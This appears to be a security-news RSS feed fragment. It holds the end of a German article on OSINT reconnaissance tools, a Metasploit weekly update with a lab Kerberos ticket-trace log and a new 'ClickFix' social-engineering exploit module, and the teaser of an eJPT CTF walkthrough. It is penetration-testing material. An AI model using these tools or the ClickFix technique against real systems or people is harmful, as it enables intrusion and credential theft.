<p>Zu den Quellen die das OSINT Tool heranzieht, gehören sowohl populäre Suchmaschinen wie Google und Bing, als auch weniger bekannte wie dogpile, DNSDumpster und die Exalead Metadaten-Engine. Sogar <a href="https://www.csoonline.com/article/565528/what-is-shodan-the-search-engine-for-everything-on-the-internet.html" title="Shodan" target="_blank">Shodan</a> kann eingebunden werden, um offene Ports auf entdeckten Hosts zu ermitteln. Ganz generell erfasst theHarvester Emails, Namen, Subdomains, IPs und URLs.</p>



<p>TheHarvester kann auf die meisten öffentlich zugänglichen Quellen ohne spezielle Maßnahmen zugreifen. Allerdings können einige wenige Quellen einen <a title="API" href="https://www.computerwoche.de/article/2790525/was-sie-ueber-application-programming-interfaces-wissen-muessen.html" target="_blank">API</a> Key erfordern – und Python muss mindestens in Version 3.6 vorliegen. Das Tool steht auf GitHub zur freien Verfügung.</p>



<p><a href="https://www.shodan.io/" target="_blank" rel="noreferrer noopener"><strong>Shodan</strong></a></p>



<p>Bei <a href="https://www.shodan.io/" title="Shodan" target="_blank" rel="noopener">Shodan</a> handelt es sich um eine dedizierte Suchmaschine, die Informationen über Geräte liefert – beispielsweise die bereits millionenfach im Einsatz befindlichen <a href="https://www.computerwoche.de/article/2793855/so-geht-sicherheit-im-internet-of-things.html" title="IoT Devices" target="_blank">IoT Devices</a>. Das OSINT Tool kann auch dazu genutzt werden, offene Ports oder Schwachstellen auf bestimmten Systemen zu finden. Einige andere Open Source Intelligence Tools nutzen Shodan als Datenquelle – eine tiefgehende Interaktion erfordert allerdings einen kostenpflichtigen Account.</p>



<p>Die Einsatzmöglichkeiten von Shodan sind dabei ziemlich beeindruckend: Es ist eines der wenigen Tools, das bei seinen Analysen auch <a href="https://www.computerwoche.de/article/2794575/erpressungs-malware-bedroht-industrieanlagen.html" title="Operational Technology" target="_blank">Operational Technology</a> (OT) mit einbeziehen, wie sie etwa in <a href="https://www.computerwoche.de/article/2745221/so-werden-industrielle-kontrollsysteme-sicher.html" title="industriellen Kontrollsystemen" target="_blank">industriellen Kontrollsystemen</a> von Kraftwerken oder Fabriken zum Einsatz kommt. Jede OSINT-Initiative wäre in einer Branche, in der IT und OT Hand in Hand gehen, also mit erheblichen Lücken behaftet wenn sie nicht auf Shodan basiert. Darüber hinaus ist es mit dem OSINT Tool auch möglich, Datenbanken zu untersuchen: Unter Umständen sind hier Informationen über Umwege öffentlich aufrufbar.</p>



<p>Eine Freelancer-Lizenz (69 Dollar monatlich) für Shodan ermöglicht den Scan von bis zu 5.120 IP-Adressen pro Monat – mit bis zu einer Million Ergebnissen. Die Corporate-Lizenz verspricht unbegrenzte Ergebnisse und ermöglicht den Scan von monatlich 327.680 IP-Adressen – <a title="für 1.099 Dollar pro Monat" href="https://account.shodan.io/billing" target="_blank" rel="noopener">für 1.099 Dollar pro Monat</a>, dann aber inklusive Schwachstellen-Suchfilter und Premium Support. Kleine(re) Unternehmen greifen auf den Small-Business-Preisplan für 359 Dollar monatlich zurück.</p>



<p><a href="https://github.com/laramies/metagoofil" target="_blank" rel="noreferrer noopener"><strong>Metagoofil</strong></a></p>



<p>Auch Metagoofil ist über die GitHub-Plattform frei verfügbar. Dieses Tool ist darauf ausgelegt, Metadaten aus öffentlichen Dokumenten zu extrahieren. Geht es um die Art des Dokuments, setzt das OSINT Tools keine Grenzen, egal ob .pdf-, .doc-, .ppt-, oder .xls-Datei.</p>



<p>Die Menge an interessanten Daten, die Metagoofil dabei aufwirft, ist beeindruckend. So können entweder im Handumdrehen die mit bestimmten Dokumenten verknüpften Usernamen ermittelt werden. Dabei gibt das OSINT Tool auch Aufschluss über den genauen Pfad, der zu den Informationen führt. Daraus lassen sich wiederum leicht Rückschlüsse über Servernamen, geteilte Ressourcen und Verzeichnisstrukturen des betreffenden Unternehmens ziehen.</p>



<p>So gut wie alle Informationen die Metagoofil liefert, wären <a title="für einen kriminellen Hacker nützlich" href="https://www.computerwoche.de/article/2793759/laedt-ihre-software-hacker-ein.html" target="_blank">für einen kriminellen Hacker nützlich</a>. Organisationen und Unternehmen können das Open Source Intelligence Tool hingegen nutzen, um genau diese Informationen vor potenziellen Übeltätern aufzuspüren und sie entsprechend abzusichern oder zu verbergen.</p>



<p><a href="https://www.babelstreet.com/platform" target="_blank" rel="noreferrer noopener"><strong>Babel Street Insights</strong></a></p>



<p>Relevante Informationen müssen nicht unbedingt auf Englisch oder Deutsch vorliegen – die Informationen, die Sie benötigen, könnten auch in Chinesisch oder Spanisch verfasst sein. An dieser Stelle kommt <a href="https://www.babelstreet.com/platform" title="Babel Street Insights" target="_blank" rel="noopener">Babel Street Insights</a> ins Spiel: Das multilinguale OSINT Tool durchsucht das öffentliche Web inklusive Blogs, Social-Media-Plattformen und Message Boards genauso, wie das <a href="https://www.computerwoche.de/article/2792460/so-guenstig-ist-ein-hack-im-darknet.html" title="Dark- und Deepweb" target="_blank">Dark- und Deepweb</a>. Das Tool kann die Quelle der gefundenen Informationen auch örtlich lokalisieren und KI-basierte Textanalysen fahren, um relevante Ergebnisse zu Tage zu fördern. Derzeit unterstützt Babel rund 200 verschiedenen Sprachen.</p>



<p>Die Einsatzszenarien für ein multilinguales OSINT Tool sind zahlreich: Kommt es etwa zu weltumspannenden <a href="https://www.computerwoche.de/article/2794933/was-sie-ueber-erpressersoftware-wissen-muessen.html" title="Ransomware-Attacken" target="_blank">Ransomware-Attacken</a>, könnten schnell Trends zur Zielerfassung ermittelt werden. Babel Street Insights könnte auch Aufschluss darüber geben, ob das geistige Eigentum eines Unternehmens auf fremden Webseiten <a href="https://www.computerwoche.de/article/2761784/werden-ihre-daten-im-darknet-gehandelt.html" title="zum Verkauf angeboten wird" target="_blank">zum Verkauf angeboten wird</a>.</p>



<p>Die OSINT-Plattform ist im Wesentlichen Cloud-basiert und ermöglicht seinen Benutzern auch, eigene Datenquellen hinzuzufügen. Mit Babel Box steht auch eine On-Premises-Version zur Verfügung, die allerdings einige Features (wie die Deepweb-Suche) vermissen lässt. Die kostengünstigste Version ist Babel Channels – die eine kuratierte Auswahl von Datenquellen zur Verfügung stellt. Eine Mobile App gibt es für sämtliche Versionen.</p>



<p><a href="https://github.com/ninoseki/mitaka" target="_blank" rel="noreferrer noopener"><strong>Mitaka</strong></a></p>



<p>Dieses Tool steht als <a href="https://chrome.google.com/webstore/detail/mitaka/bfjbejmeoibbdpfdbmbacmefcbannnbg" title="Chrome Extension" target="_blank" rel="noopener">Chrome Extension</a> oder <a href="https://addons.mozilla.org/en-US/firefox/addon/mitaka/" title="Firefox Add-On" target="_blank" rel="noopener">Firefox Add-On</a> zur Verfügung und bietet Ihnen eine browserbasierte Suche nach IP-Adressen, Domains, URLs, Hashes, ASNs, Bitcoin-Wallet-Adressen und zahlreichen anderen “Indicators of Compromise”. Dabei werden sechs verschiedene Suchmaschinen einbezogen.</p>



<p>Praktischerweise dient Mitaka auch als Shortcut zu zahlreichen Online-Datenbanken, die mit einem Klick durchsucht werden können. Für alle die etwas weniger Umfang bevorzugen, steht die alternative Extension <a title="Sputnik" href="https://github.com/mitchmoser/sputnik" target="_blank" rel="noopener">Sputnik</a> zur Verfügung.</p>



<p><a href="https://builtwith.com/" target="_blank" rel="noreferrer noopener"><strong>BuiltWith</strong></a></p>



<p>Wie der Name nahelegt, können Sie mit BuiltWith herausfinden, auf welcher Basis populäre Webseiten erstellt wurden (WordPress, Joomla, Drupal, etc.) und weitergehende Details sichtbar machen. Dazu gehört zum Beispiel eine Liste der JavaScript/CSS Bibliotheken, die eine Website nutzt. Darüber hinaus können auch Plugins, Frameworks, Server-, Analytics- und Tracking-Informationen gewonnen werden.</p>



<p>Wenn Sie lediglich Informationen über das Tech Stack hinter einer Webseite einsehen wollen, fahren Sie mit <a title="Wappalyzer" href="https://www.wappalyzer.com/" target="_blank" rel="noopener">Wappalyzer</a> unter Umständen besser, da es ein schlankeres OSINT Tool ist.</p>



<p><a href="https://grep.app/" target="_blank" rel="noreferrer noopener"><strong>Grep.app</strong></a></p>



<p>Wie durchsucht man eine halbe Million Git Repositories? Am besten und effizientesten mit Grep.app. Die Lösung ist auch hilfreich, wenn Sie nach Strings in Zusammenhang mit IOCs oder Schadcode suchen wollen.</p>



<p><strong>Weitere OSINT-Werkzeuge</strong></p>



<p>Neben diesen Tools stehen eine Menge weiterer zur Verfügung, um an OSINT-Daten zu gelangen. Einen guten Anlaufpunkt, um diese zu erkunden, bildet das <a title="OSINT Framework" href="https://osintframework.com/" target="_blank" rel="noopener">OSINT Framework</a>. Das webbasierte Interface bringt Sie zu den Tools die Sie brauchen, um an die benötigten Informationen zu gelangen. Sämtliche Tools die hier zu finden sind, sind kostenfrei – einige erfordern allerdings eine Registrierung oder bieten in der Bezahlversion bessere Features.</p>



<h2 class="wp-block-heading">Mit OSINT Lücken schließen</h2>



<p>Nicht jeder Hackerangriff muss ein Advanced Persistent Threat sein oder unter Anwendung besonders raffinierter Methoden ablaufen. Auch kriminelle Hacker gehen am liebsten den Weg des geringsten Widerstandes. Schließlich wäre es unsinnig, Monate damit zu verschwenden, Systeme zu kompromittieren, wenn alle notwendigen Informationen in öffentlich zugänglichen Kanälen vorliegen.</p>



<p>OSINT Tools können Unternehmen dabei unterstützen, herauszufinden, welche Informationen über ihre Netzwerke, Daten und Nutzer öffentlich zugänglich sind. Dabei kommt es vor allem darauf an, diese Daten möglichst schnell zu finden, bevor sie ausgenutzt werden können. (fm)</p>



<p><strong>Dieser Artikel ist <a href="https://www.csoonline.com/article/567859/what-is-osint-top-open-source-intelligence-tools.html" target="_blank">im Original</a> bei unserer Schwesterpublikation CSOonline.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weekly Metasploit Update: New Kerberos/Certificate tracing options, and multiple new modules]]></title>
<description><![CDATA[New Tracing OptionsAs hard as we try to ensure that Metasploit is bug free, issues inevitably come up. Whether you’re running a module on an op or writing a new one, what we can do is make the debugging experience easier. To that end one of our two Google Summer of Code (GSoC) projects is here to...]]></description>
<link>https://tsecurity.de/de/3594797/it-security-nachrichten/weekly-metasploit-update-new-kerberoscertificate-tracing-options-and-multiple-new-modules/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594797/it-security-nachrichten/weekly-metasploit-update-new-kerberoscertificate-tracing-options-and-multiple-new-modules/</guid>
<pubDate>Sat, 13 Jun 2026 02:52:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>New Tracing Options</h2><p>As hard as we try to ensure that Metasploit is bug free, issues inevitably come up. Whether you’re running a module on an op or writing a new one, what we can do is make the debugging experience easier. To that end one of our two Google Summer of Code (GSoC) projects is here to deliver. Building on the previous pattern of HttpTrace comes two new options <span data-type="inlineCode">KerberosTicketTrace</span> and <span data-type="inlineCode">CertificateTrace</span>. These options, when enabled, will enable debugging output of Kerberos tickets and Certificates that are both sent and received by applicable modules. Now when things aren’t going quite right, users have new levers to reach for to inspect what’s happening under the hood.</p><p>For example, to inspect exactly what’s happening when using the <span data-type="inlineCode">auxiliary/admin/kerberos/get_ticket</span><span data-type="inlineCode"> module:</span></p><pre language="html">msf auxiliary(admin/kerberos/get_ticket) &gt; set KerberosTicketTrace true 
KerberosTicketTrace =&gt; true
msf auxiliary(admin/kerberos/get_ticket) &gt; run
[*] Running module against 192.168.159.10
[*] 192.168.159.10:88 - Getting TGT for smcintyre@msflab.local
####################
# Kerberos Request: AS-REQ
####################
Protocol Version: 5
Message Type: 10 (AS-REQ)
Pre-Authentication Data:
  Entry[0]:
    Type: 128 (PA_PAC_REQUEST)
    Value: [binary 7 bytes: 3005a0030101ff]
Request Body:
  KDC Options:
    Value: 1082195984
    Flags:
      - FORWARDABLE
      - RENEWABLE
      - CANONICALIZE
      - RENEWABLE_OK
  Client Name:
    Name Type: 1 (NT_PRINCIPAL)
    Name String:
      - smcintyre
  Realm: MSFLAB.LOCAL
  Server Name:
    Name Type: 1 (NT_PRINCIPAL)
    Name String:
      - krbtgt
      - MSFLAB.LOCAL
  Till: 2026-06-12T18:21:36Z
  Rtime: 2026-06-12T18:21:36Z
  Nonce: 6831592
  Encryption Type:
    - 18 (AES256)
    - 17 (AES128)
    - 23 (RC4_HMAC)
    - 3 (DES_CBC_MD5)
    - 16 (DES3_CBC_SHA1)
####################
# Kerberos Response: KRB-ERROR
####################
Protocol Version: 5
Message Type: 30 (KRB-ERROR)
Server Time: 2026-06-11T18:21:36Z
Server Microseconds: 862696
Error Code:
  Name: KDC_ERR_PREAUTH_REQUIRED
  Value: 25
  Description: Additional pre-authentication required
Realm: MSFLAB.LOCAL
Server Name:
  Name Type: 1 (NT_PRINCIPAL)
  Name String:
    - krbtgt
    - MSFLAB.LOCAL
Error Data: [binary 87 bytes: 30553032a103020113a22b04293027301ea003020112a1171b154d53464c41422e4c4f43414c736d63696e747972653005a0030201173009a103020102a20204003009a103020110a20204003009a10302010fa2020400]
####################
# Kerberos Request: AS-REQ
####################
Protocol Version: 5
Message Type: 10 (AS-REQ)
Pre-Authentication Data:
  Entry[0]:
    Type: 2 (PA_ENC_TIMESTAMP)
    Value: [binary 67 bytes: 3041a003020112a23a0438724f4965bd3deb1f061e807b616a09b613f59d9a6749eaee895e2ec3ed3045403cb28874acaa371681e3957a3ec23879141411ba788886f3]
  Entry[1]:
    Type: 128 (PA_PAC_REQUEST)
    Value: [binary 7 bytes: 3005a0030101ff]
Request Body:
  KDC Options: 1350565888
  Client Name:
    Name Type: 1 (NT_PRINCIPAL)
    Name String:
      - smcintyre
  Realm: MSFLAB.LOCAL
  Server Name:
    Name Type: 1 (NT_PRINCIPAL)
    Name String:
      - krbtgt
      - MSFLAB.LOCAL
  Till: 2026-06-12T18:21:36Z
  Rtime: 2026-06-12T18:21:36Z
  Nonce: 7068778
  Encryption Type:
    - 18 (AES256)
    - 23 (RC4_HMAC)
####################
# Kerberos Response: AS-REP
####################
Protocol Version: 5
Message Type: 11 (AS-REP)
Pre-Authentication Data:
  Entry[0]:
    Type: 19 (PA_ETYPE_INFO2)
    Value: [binary 34 bytes: 3020301ea003020112a1171b154d53464c41422e4c4f43414c736d63696e74797265]
Client Realm: MSFLAB.LOCAL
Client Name:
  Name Type: 1 (NT_PRINCIPAL)
  Name String:
    - smcintyre
Ticket:
  Ticket Version Number: 5
  Realm: MSFLAB.LOCAL
  Server Name:
    Name Type: 1 (NT_PRINCIPAL)
    Name String:
      - krbtgt
      - MSFLAB.LOCAL
  Encrypted Part:
    Encryption Type: 18 (AES256)
    Key Version Number: 2
    Cipher: [binary 1098 bytes: a3b825bd279344fd0bc454654f7906e31c8f4918c7c69319515e6a722515b55da36e2ae26f107d9f6278b029ba4c1b937a8a4e9df04f4a54da43794b2216fd5d7762582e94e3aa72fd14bfa0cfb9ff5c9a138acecd57351ff7ca98a9d7d890445316b04359e9210f93ba72c578a1605fb5502ba00fe67d9b55417e356e6400ef3bd07b9e1a8e4aedeb62249bef9f56f0cda3a30969d33fe6999a4855ae8f666b82fdff29047b14d4bcd77b31a6b9ce1ee3a4425cd197250af0cc878995afbeb4de42fb7e55d6095ab27ab3fa7f0afb0010b8e8f5e721a3d0417c7342df77619f6520e726652dc4417d2dbc044529236557441f87a50a7188242fb177e5f1bd45d31902c877d51cd05af7215e520c410e9b7036bc78c1ddad458b0ad99832c4fdd6f8f523ca4241aee8ebce4a0000202ebfb870761833feffc2c248683751a11d556bba4c59b20c7a1627b187d4d4679e19b1928f3ab7edeef3f01b459324178a9e49976519b58d6d7164b29c77e20625c4e710e3bbb0bb32452d4bdb9ed0c3e9873b9511cadf36fb0b372af5f67310319f160c0242d2fff1095bc467c4eb6da0382ab0587d519e5390e56eacb6db4f98c2c25b7ac22edf40db2e0e0eca03dfeba48327916a8caa85c382d04dcea16116c76132dcbfc168b7e3435a37f812f479f1e8309b124a9dcbac1e2ae83063a5e49c1ea584f13f64832c713577f07b3229e83c0fe73c3dc350640a69ea643ef24b66ed17114c262d3e5cdddb8182d8da49173e597b23d94f8ef652433713bf1d5e91c7f984945940d27755584137b00baa9696cdd121c641870830ffc86c8f9989254b6b804912c4989014b3f849cd02e6b06d3cc6401fd3f830cfcd36a0ecf31309d5b6dc82a65b427818694002bcf5fac9c936e1d64205a397126f39f684903803a5405baff041881339c4c8d325a2f446178b66383c209f3dba61bdda626f6e6d63c473638191e447d58aebfcb5a98104c2f96afa3283ac3aca675937afd7c497f1bd41a3dd1b52a6a16db791421a4ab9189d9fa0d610713d9c1eeb2f9c46d6ea197f48e2e643fe773ece0855c63b44b6020044fb7cc1396b26b4747941484b73108b7c1c90e2670cf723033274cc24ceb66a7054b35a9653cd7391a4f81b2c977ee251c9295e47be46b14c66b4031c6758415e543153bde190af0f1abe0f207d84145e3521850f89765997ab72cccaaeb4c5ce8b8be9b33712090d59424c2517e4cd539740750f5792f171fec2b4e4b4bc00cb77bc308abe1b70c75684734aa9ef03c4b419d2e10b4ea6229faf5a4b2af9483156ea32bc4b298f158067ac45afd5c812c407bda57880434cb93a60ac19799004a9adc72d845401ebb8e2a31ed0edf539233d293b1141bb49b36b6475d87c0fd114d97a946e82e39ed58e6c2e0d72826059600d412bd05aaf0af5602ade2f1ff6db363ec33e25756c4bc417b248344ba19ecd8d80d2cd2c2ff32aa355c22ee96166fc7043204dcc48b5595416c4312855c7d6e31d422c93c1d6f3df1a5890b45fc55f1b757b8e]
Encrypted Part:
  Encryption Type: 18 (AES256)
  Key Version Number: 3
  Cipher: [binary 271 bytes: 357637faf370a69ec4780f1fc4308e3d639e59ebbdb5d208cf6df75470bcefdd5210a098aa716055f758d9ec58674abc4b56cec2923329309e2be192db3ee1a63c6f0133a96c440707a0f29f2e075f90c54e2ab7626132f8e898112f81cbde6905d992d9ec6a4c26087043ea8f97c1a876354c47b4a6a76e3321f42edc483530d5248f8daa01db15ab019ac4179dfdb5f6d6c1f2666b9983cd02989612acdad2b2efe352fb9708a080fd304d17a87ff1e152dc8ca981de6cff418f38c5c28612766bfc13fbac51bad1a01fcd7aae544c7d839124e1bce745d20d06c8aca5c7125afe069e8d5299a10cd27b392bd8ae3893181f132f3d49dd746c6c70c6d2b651df998c59be84f2d5b83e5b3c0a71b2]
[+] 192.168.159.10:88 - Received a valid TGT-Response
[*] 192.168.159.10:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20260611142136_default_192.168.159.10_mit.kerberos.cca_918073.bin
####################
# Kerberos Credential: TGT
####################
Creds: 1
  Credential[0]:
    Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
    Client: smcintyre@MSFLAB.LOCAL
    Ticket etype: 18 (AES256)
    Key: 58b969939485b53dee75e4399253524d132cc2ca145f4da4e4951c04a843e544
    Subkey: false
    Ticket Length: 1188
    Ticket Flags: 0x50e10000 (FORWARDABLE, PROXIABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
    Addresses: 0
    Authdatas: 0
    Times:
      Auth time: 2026-06-11 14:21:36 -0400
      Start time: 2026-06-11 14:21:36 -0400
      End time: 2026-06-12 00:21:36 -0400
      Renew Till: 2026-06-12 14:21:36 -0400
    Ticket:
      Ticket Version Number: 5
      Realm: MSFLAB.LOCAL
      Server Name: krbtgt/MSFLAB.LOCAL
      Encrypted Ticket Part:
        Ticket etype: 18 (AES256)
        Key Version Number: 2
        Cipher:
          o7glvSeTRP0LxFRlT3kG4xyPSRjHxpMZUV5qciUVtV2jbiribxB9n2J4sCm6TBuTeopOnfBPSlTaQ3lLIhb9XXdiWC6U46py/RS/oM+5/1yaE4rOzVc1H/fKmKnX2JBEUxawQ1npIQ+TunLFeKFgX7VQK6AP5n2bVUF+NW5kAO870HueGo5K7etiJJvvn1bwzaOjCWnTP+aZmkhVro9ma4L9/ykEexTUvNd7Maa5zh7jpEJc0ZclCvDMh4mVr7603kL7flXWCVqyerP6fwr7ABC46PXnIaPQQXxzQt93YZ9lIOcmZS3EQX0tvARFKSNlV0Qfh6UKcYgkL7F35fG9RdMZAsh31RzQWvchXlIMQQ6bcDa8eMHdrUWLCtmYMsT91vj1I8pCQa7o685KAAAgLr+4cHYYM/7/wsJIaDdRoR1Va7pMWbIMehYnsYfU1GeeGbGSjzq37e7z8BtFkyQXip5Jl2UZtY1tcWSynHfiBiXE5xDju7C7MkUtS9ue0MPphzuVEcrfNvsLNyr19nMQMZ8WDAJC0v/xCVvEZ8TrbaA4KrBYfVGeU5Dlbqy220+YwsJbesIu30DbLg4OygPf66SDJ5FqjKqFw4LQTc6hYRbHYTLcv8Fot+NDWjf4EvR58egwmxJKncusHiroMGOl5JwepYTxP2SDLHE1d/B7MinoPA/nPD3DUGQKaepkPvJLZu0XEUwmLT5c3duBgtjaSRc+WXsj2U+O9lJDNxO/HV6Rx/mElFlA0ndVWEE3sAuqlpbN0SHGQYcIMP/IbI+ZiSVLa4BJEsSYkBSz+EnNAuawbTzGQB/T+DDPzTag7PMTCdW23IKmW0J4GGlAArz1+snJNuHWQgWjlxJvOfaEkDgDpUBbr/BBiBM5xMjTJaL0RheLZjg8IJ89umG92mJvbm1jxHNjgZHkR9WK6/y1qYEEwvlq+jKDrDrKZ1k3r9fEl/G9QaPdG1KmoW23kUIaSrkYnZ+g1hBxPZwe6y+cRtbqGX9I4uZD/nc+zghVxjtEtgIARPt8wTlrJrR0eUFIS3MQi3wckOJnDPcjAzJ0zCTOtmpwVLNallPNc5Gk+Bssl37iUckpXke+RrFMZrQDHGdYQV5UMVO94ZCvDxq+DyB9hBReNSGFD4l2WZercszKrrTFzouL6bM3EgkNWUJMJRfkzVOXQHUPV5Lxcf7CtOS0vADLd7wwir4bcMdWhHNKqe8DxLQZ0uELTqYin69aSyr5SDFW6jK8SymPFYBnrEWv1cgSxAe9pXiAQ0y5OmCsGXmQBKmtxy2EVAHruOKjHtDt9TkjPSk7EUG7SbNrZHXYfA/RFNl6lG6C457VjmwuDXKCYFlgDUEr0FqvCvVgKt4vH/bbNj7DPiV1bEvEF7JINEuhns2NgNLNLC/zKqNVwi7pYWb8cEMgTcxItVlUFsQxKFXH1uMdQiyTwdbz3xpYkLRfxV8bdXuO
[*] Auxiliary module execution completed
msf auxiliary(admin/kerberos/get_ticket) &gt;</pre><br><p>Stay tuned for future enhancements like KerberosTicketTraceLevel which should have verbosity toggles such as meta, ticket, and full. We’d like to thank our GSoC contributors <a href="https://github.com/eve0805">eve0805</a> and <a href="https://github.com/Pushpenderrathore">Pushpenderrathore</a> for their hard work on this project.</p><h2>Upcoming Evasion Module Changes</h2><p>Metasploit is currently reconsidering the UX of evasion modules whereby users are currently required to use the module, set the payload, run it, then return to their exploit and copy the generated output from the evasion module into the exploit. This is a cumbersome process and we think we can do better but before we commit to a direction, we are soliciting feedback from the community on what they think would be the best path forward. To that end, we’ve <a href="https://gist.github.com/smcintyre-r7/09488f45904d73ff0ce0d5a7f7e5a830">published</a> a writeup of the options we’re considering and a <a href="https://docs.google.com/forms/d/e/1FAIpQLSfa1JVJzqrQ2lh9a0peW8VGs3pNSb47vw5RJWVicfiQU5bpDg/viewform">form</a> through which we’re hoping to receive feedback. The form contains 3 questions and will be open until July 1st, 2026.</p><h2>New module content (1)</h2><h3>ClickFix Server</h3><p>Authors: boredchilada and h00die</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21212">#21212</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: multi/misc/clickfix_server</p><p>Description: Adds a new Metasploit exploit module exploit/multi/misc/clickfix_server that runs an HTTP server to deliver a "ClickFix"-style social-engineering page which copies a generated command payload to the victim’s clipboard that they are prompted execute.</p><h2>Enhancements and features (9)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21008">#21008</a> from <a href="https://github.com/EclipseAditya">EclipseAditya</a> - Adds kernel_rex_version to Msf::Post::Linux::Kernel, a new helper that extracts the upstream kernel version from <span data-type="inlineCode">uname -r</span><span data-type="inlineCode"> </span>and returns a <span data-type="inlineCode">Rex::Version</span>. This eliminates an ArgumentError crash that occurred when 15+ Linux local exploit modules encountered distro-specific kernel version suffixes.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21198">#21198</a> from <a href="https://github.com/Pushpenderrathore">Pushpenderrathore</a> - This adds a <span data-type="inlineCode">CertificateTracePresenter</span>, implementing certificate tracing using the presenter pattern aligned with existing Metasploit conventions. This can be enabled by setting the <span data-type="inlineCode">CertificateTrace</span> datastore option when using modules like <span data-type="inlineCode">icpr_cert</span> and <span data-type="inlineCode">get_ticket</span> to see the X.509 certificates being sent and received.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21222">#21222</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Standardizes the log output across many Metasploit modules to improve the host and port log details when IPv6 addresses are present.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21266">#21266</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - This improves how we log SMB services. If the service is detected but authentication fails, the client still logs what dialect was negotiated so we log the service even if we couldn't authenticate to it.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21383">#21383</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - This bumps Ruby SMB to version 3.1.21 and closes a feature gap between Ruby SMB and the Rex SMB client. With the feature gap closed, <span data-type="inlineCode">modules/auxiliary/admin/smb/samba_symlink_traversal.rb</span> can now be switched from Rex to the RubySMB client. One less module in the way of dropping the ancient Rex client.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21466">#21466</a> from <a href="https://github.com/eve0805">eve0805</a> - This adds introduces KerberosTicketTrace support as a datastore option for Metasploit's Kerberos authentication flows. Enabling <span data-type="inlineCode">KerberosTicketTrace</span> allows users to see the following requests and responses as they are sent and received: AS-REQ, AS-REP, TGS-REQ, TGS-REP, KRB-ERROR. Inbound messages are colored blue and outgoing messages are colored red to match the existing HttpTrace functionality. The coloring can be turned off and on with the KerberosTicketTraceColors datastore option.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21528">#21528</a> from <a href="https://github.com/h00die">h00die</a> - This PR updates Metasploit module metadata by adding Exploit-DB (EDB) reference IDs to existing modules that already have CVE references, improving cross-referencing for higher-fidelity vulnerability tracking.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21535">#21535</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Updates multiple HTTP login scanners to validate the remote target as a pre-requisite to running the login attempts.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21554">#21554</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Make WebDAV upload PHP exploit checks less strict.</li></ul><h2>Bugs fixed (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20618">#20618</a> from <a href="https://github.com/Aaditya1273">Aaditya1273</a> - Updates the MSSQL modules to no longer crash when running stored procedures like <span data-type="inlineCode">EXEC sp_linkedservers;</span> against a remote host.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21543">#21543</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Addresses a recent issue stemming from the recently-made changes to the webdav upload php module, where a false positive was being reported based on only the response code.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21549">#21549</a> from <a href="https://github.com/4ravind-b">4ravind-b</a> - Adds the missing <a href="https://github.com/advisories/GHSA-hxj9-549w-4pcq">https://github.com/advisories/GHSA-hxj9-549w-4pcq</a> reference to <span data-type="inlineCode">modules/auxiliary/scanner/smtp/smtp_relay.rb</span>.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21557">#21557</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a db_import crash when importing zip files.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-06-04T12%3A43%3A08Z..2026-06-11T10%3A00%3A50Z%22">Pull Requests 6.4.136...6.4.137</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.136...6.4.137">Full diff 6.4.136...6.4.137</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Host & Network Penetration Testing: System-Host Based Attacks CTF 2 — eJPT (INE)]]></title>
<description><![CDATA[A beginner-friendly walkthrough covering Shellshock exploitation, libssh authentication bypass, and SUID privilege escalation across two Linux targets.Hello everyone! 👋In this blog, I’ll walk through the System-Host Based Attacks CTF 2 from INE’s eJPT path and explain how I approached each flag. ...]]></description>
<link>https://tsecurity.de/de/3583941/hacking/host-network-penetration-testing-system-host-based-attacks-ctf-2-ejpt-ine/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583941/hacking/host-network-penetration-testing-system-host-based-attacks-ctf-2-ejpt-ine/</guid>
<pubDate>Tue, 09 Jun 2026 11:08:58 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
